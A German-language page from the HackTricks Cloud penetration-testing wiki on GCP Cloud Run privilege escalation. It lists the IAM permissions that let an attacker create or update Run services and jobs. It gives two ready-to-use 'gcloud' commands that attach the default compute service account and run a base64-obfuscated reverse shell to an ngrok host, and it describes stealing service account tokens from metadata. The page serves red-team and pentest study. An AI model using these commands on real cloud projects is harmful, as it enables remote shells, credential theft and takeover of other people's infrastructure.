GCP - Run Privesc

Erlernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Wenn Sie Ihr Unternehmen in HackTricks beworben sehen möchten oder HackTricks im PDF-Format herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie mir auf Twitter 🐦 @carlospolopm.
Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories einreichen.

Cloud Run

Für weitere Informationen zu Cloud Run siehe:

`run.services.create`, `iam.serviceAccounts.actAs`, `run.routes.invoke`

Ein Angreifer mit diesen Berechtigungen kann einen Run-Service erstellen, der beliebigen Code ausführt (beliebigen Docker-Container), einen Service Account daran anhängen und den Code veranlassen, das Service Account-Token aus den Metadaten zu exfiltrieren.

Ein Exploit-Skript für diese Methode finden Sie hier und das Docker-Image finden Sie hier.

Beachten Sie, dass bei Verwendung von gcloud run deploy anstelle des einfachen Erstellens des Dienstes die Berechtigung update erforderlich ist. Überprüfen Sie ein Beispiel hier.

`run.services.update`, `iam.serviceAccounts.actAs`

Ähnlich wie der vorherige, aber ein Dienst wird aktualisiert:

gcloud run deploy hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account="<proj-num>-compute@developer.gserviceaccount.com" \
--region=us-central1 \
--allow-unauthenticated

`run.services.setIamPolicy`

Geben Sie sich zuvor Berechtigungen über Cloud Run.

`run.jobs.create`, `run.jobs.run`, (`run.jobs.get`)

Starten Sie einen Job mit einer Reverse-Shell, um das im Befehl angegebene Dienstkonto zu stehlen. Sie können hier eine Ausnutzung finden.

`run.jobs.update`,`run.jobs.run`,`iam.serviceaccounts.actAs`,(`run.jobs.get`)

Ähnlich wie zuvor ist es möglich, einen Job zu aktualisieren und das SA zu aktualisieren, den Befehl zu ausführen:

gcloud beta run jobs update hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account=<proj-num>-compute@developer.gserviceaccount.com \
--region=us-central1 \
--project=security-devbox --execute-now

`run.jobs.setIamPolicy`

Geben Sie sich die zuvor genannten Berechtigungen für Cloud Jobs.

Referenzen

https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/

Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Wenn Sie Ihr Unternehmen in HackTricks beworben sehen möchten oder HackTricks im PDF-Format herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
Holen Sie sich das offizielle PEASS & HackTricks-Merch
Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie mir auf Twitter 🐦 @carlospolopm.
Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud Github-Repositories einreichen.

PreviousGCP - Resourcemanager Privesc NextGCP - Secretmanager Privesc

Last updated 1 month ago

Cloud Run

run.services.create, iam.serviceAccounts.actAs, run.routes.invoke

run.services.update, iam.serviceAccounts.actAs

run.services.setIamPolicy

run.jobs.create, run.jobs.run, (run.jobs.get)

run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)

run.jobs.setIamPolicy